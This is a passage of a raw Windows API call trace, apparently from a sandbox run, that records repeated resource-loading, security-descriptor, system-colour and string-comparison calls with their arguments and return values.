pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.154] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.154] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.154] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.154] LockResource (hResData=0x0) returned 0x0 [0220.154] FreeResource (hResData=0x0) returned 0 [0220.154] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.154] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.154] LockResource (hResData=0x0) returned 0x0 [0220.154] FreeResource (hResData=0x0) returned 0 [0220.154] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.154] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.154] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.154] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.154] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.154] LockResource (hResData=0x0) returned 0x0 [0220.154] FreeResource (hResData=0x0) returned 0 [0220.154] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.154] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.154] LockResource (hResData=0x0) returned 0x0 [0220.155] FreeResource (hResData=0x0) returned 0 [0220.155] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.155] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.155] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.155] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.155] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.155] LockResource (hResData=0x0) returned 0x0 [0220.155] FreeResource (hResData=0x0) returned 0 [0220.155] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.155] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.155] LockResource (hResData=0x0) returned 0x0 [0220.155] FreeResource (hResData=0x0) returned 0 [0220.155] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.155] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.155] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.155] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.155] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.155] LockResource (hResData=0x0) returned 0x0 [0220.155] FreeResource (hResData=0x0) returned 0 [0220.155] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.155] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.155] LockResource (hResData=0x0) returned 0x0 [0220.155] FreeResource (hResData=0x0) returned 0 [0220.155] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.155] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.155] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.155] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.155] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.155] LockResource (hResData=0x0) returned 0x0 [0220.155] FreeResource (hResData=0x0) returned 0 [0220.155] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.155] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.155] LockResource (hResData=0x0) returned 0x0 [0220.155] FreeResource (hResData=0x0) returned 0 [0220.155] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.155] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.155] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.155] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.155] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.155] LockResource (hResData=0x0) returned 0x0 [0220.155] FreeResource (hResData=0x0) returned 0 [0220.155] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.155] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.156] LockResource (hResData=0x0) returned 0x0 [0220.156] FreeResource (hResData=0x0) returned 0 [0220.156] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.156] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.156] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.156] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.156] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.156] LockResource (hResData=0x0) returned 0x0 [0220.156] FreeResource (hResData=0x0) returned 0 [0220.156] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.156] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.156] LockResource (hResData=0x0) returned 0x0 [0220.156] FreeResource (hResData=0x0) returned 0 [0220.156] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.156] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.156] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.156] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.156] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.156] LockResource (hResData=0x0) returned 0x0 [0220.156] FreeResource (hResData=0x0) returned 0 [0220.156] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.156] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.156] LockResource (hResData=0x0) returned 0x0 [0220.156] FreeResource (hResData=0x0) returned 0 [0220.156] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.156] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.156] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.156] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.156] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.156] LockResource (hResData=0x0) returned 0x0 [0220.156] FreeResource (hResData=0x0) returned 0 [0220.156] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.156] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.156] LockResource (hResData=0x0) returned 0x0 [0220.156] FreeResource (hResData=0x0) returned 0 [0220.156] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.156] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.156] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.156] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.156] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.156] LockResource (hResData=0x0) returned 0x0 [0220.156] FreeResource (hResData=0x0) returned 0 [0220.156] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.156] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.157] LockResource (hResData=0x0) returned 0x0 [0220.157] FreeResource (hResData=0x0) returned 0 [0220.157] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.157] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.157] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.157] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.157] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.157] LockResource (hResData=0x0) returned 0x0 [0220.157] FreeResource (hResData=0x0) returned 0 [0220.157] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.157] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.157] LockResource (hResData=0x0) returned 0x0 [0220.157] FreeResource (hResData=0x0) returned 0 [0220.157] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.157] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.157] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.157] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.157] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.157] LockResource (hResData=0x0) returned 0x0 [0220.157] FreeResource (hResData=0x0) returned 0 [0220.157] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.157] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.157] LockResource (hResData=0x0) returned 0x0 [0220.157] FreeResource (hResData=0x0) returned 0 [0220.157] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.157] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.157] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.157] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.157] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.157] LockResource (hResData=0x0) returned 0x0 [0220.157] FreeResource (hResData=0x0) returned 0 [0220.157] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.157] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.157] LockResource (hResData=0x0) returned 0x0 [0220.157] FreeResource (hResData=0x0) returned 0 [0220.157] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.157] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.157] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.157] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.157] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.157] LockResource (hResData=0x0) returned 0x0 [0220.157] FreeResource (hResData=0x0) returned 0 [0220.157] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.157] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.158] LockResource (hResData=0x0) returned 0x0 [0220.158] FreeResource (hResData=0x0) returned 0 [0220.158] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.158] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.158] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.158] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.158] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.158] LockResource (hResData=0x0) returned 0x0 [0220.158] FreeResource (hResData=0x0) returned 0 [0220.158] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.158] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.158] LockResource (hResData=0x0) returned 0x0 [0220.158] FreeResource (hResData=0x0) returned 0 [0220.158] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.158] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.158] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.158] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.158] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.158] LockResource (hResData=0x0) returned 0x0 [0220.158] FreeResource (hResData=0x0) returned 0 [0220.158] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.158] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.158] LockResource (hResData=0x0) returned 0x0 [0220.158] FreeResource (hResData=0x0) returned 0 [0220.158] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.158] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.158] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.158] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.158] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.158] LockResource (hResData=0x0) returned 0x0 [0220.158] FreeResource (hResData=0x0) returned 0 [0220.158] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.158] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.158] LockResource (hResData=0x0) returned 0x0 [0220.158] FreeResource (hResData=0x0) returned 0 [0220.158] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.158] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.158] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.158] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.158] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.158] LockResource (hResData=0x0) returned 0x0 [0220.158] FreeResource (hResData=0x0) returned 0 [0220.158] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.159] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.159] LockResource (hResData=0x0) returned 0x0 [0220.159] FreeResource (hResData=0x0) returned 0 [0220.159] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.159] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.159] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.159] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.159] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.159] LockResource (hResData=0x0) returned 0x0 [0220.159] FreeResource (hResData=0x0) returned 0 [0220.159] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.159] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.159] LockResource (hResData=0x0) returned 0x0 [0220.159] FreeResource (hResData=0x0) returned 0 [0220.159] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.159] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.159] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.159] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.159] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.159] LockResource (hResData=0x0) returned 0x0 [0220.159] FreeResource (hResData=0x0) returned 0 [0220.159] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.159] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.159] LockResource (hResData=0x0) returned 0x0 [0220.159] FreeResource (hResData=0x0) returned 0 [0220.159] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.159] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.159] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.159] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.159] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.159] LockResource (hResData=0x0) returned 0x0 [0220.159] FreeResource (hResData=0x0) returned 0 [0220.159] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.159] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.159] LockResource (hResData=0x0) returned 0x0 [0220.159] FreeResource (hResData=0x0) returned 0 [0220.159] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.159] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.160] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.160] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.160] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.160] LockResource (hResData=0x0) returned 0x0 [0220.160] FreeResource (hResData=0x0) returned 0 [0220.160] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.160] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.160] LockResource (hResData=0x0) returned 0x0 [0220.160] FreeResource (hResData=0x0) returned 0 [0220.160] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.160] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.160] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.160] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.160] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.160] LockResource (hResData=0x0) returned 0x0 [0220.160] FreeResource (hResData=0x0) returned 0 [0220.160] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.160] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.160] LockResource (hResData=0x0) returned 0x0 [0220.160] FreeResource (hResData=0x0) returned 0 [0220.160] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.160] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.160] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.160] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.160] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.160] LockResource (hResData=0x0) returned 0x0 [0220.160] FreeResource (hResData=0x0) returned 0 [0220.165] GetSysColor (nIndex=17) returned 0x6d6d6d [0220.165] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0220.166] GetSysColor (nIndex=17) returned 0x6d6d6d [0220.166] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0220.166] GetSysColor (nIndex=17) returned 0x6d6d6d [0220.166] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0220.166] GetSysColor (nIndex=17) returned 0x6d6d6d [0220.166] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0220.166] GetSysColor (nIndex=17) returned 0x6d6d6d [0220.166] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0220.166] GetSysColor (nIndex=17) returned 0x6d6d6d [0220.166] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0220.166] GetSysColor (nIndex=17) returned 0x6d6d6d [0220.166] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0220.166] GetSysColor (nIndex=17) returned 0x6d6d6d [0220.166] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0220.166] GetSysColor (nIndex=17) returned 0x6d6d6d [0220.166] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0220.166] GetSysColor (nIndex=17) returned 0x6d6d6d [0220.166] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0220.166] GetSysColor (nIndex=17) returned 0x6d6d6d [0220.166] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0220.166] GetSysColor (nIndex=17) returned 0x6d6d6d [0220.166] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0220.166] GetSysColor (nIndex=17) returned 0x6d6d6d [0220.166] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0220.166] GetSysColor (nIndex=17) returned 0x6d6d6d [0220.166] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0220.166] GetSysColor (nIndex=17) returned 0x6d6d6d [0220.166] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0220.166] GetSysColor (nIndex=17) returned 0x6d6d6d [0220.166] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0220.166] lstrlenA (lpString="") returned 0 [0220.167] StrCmpNIA (lpStr1="", lpStr2="", nChar=0) returned 0 [0220.167] lstrlenA (lpString="") returned 0 [0220.167] StrCmpNIA (lpStr1="", lpStr2="", nChar=0) returned 0 [0220.167] lstrlenA (lpString="") returned 0 [0220.167] StrCmpNIA (lpStr1="", lpStr2="", nChar=0) returned 0 [0220.167] lstrlenA (lpString="") returned 0 [0220.167] StrCmpNIA (lpStr1="", lpStr2="", nChar=0) returned 0 [0220.167] lstrlenA (lpString="") returned 0 [0220.167] StrCmpNIA (lpStr1="", lpStr2="", nChar=0) returned 0 [0220.167] lstrlenA (lpString="") returned 0 [0220.167] StrCmpNIA (lpStr1="", lpStr2="", nChar=0) returned 0 [0220.167] lstrlenA (lpString="") returned 0 [0220.167] StrCmpNIA (lpStr1="", lpStr2="", 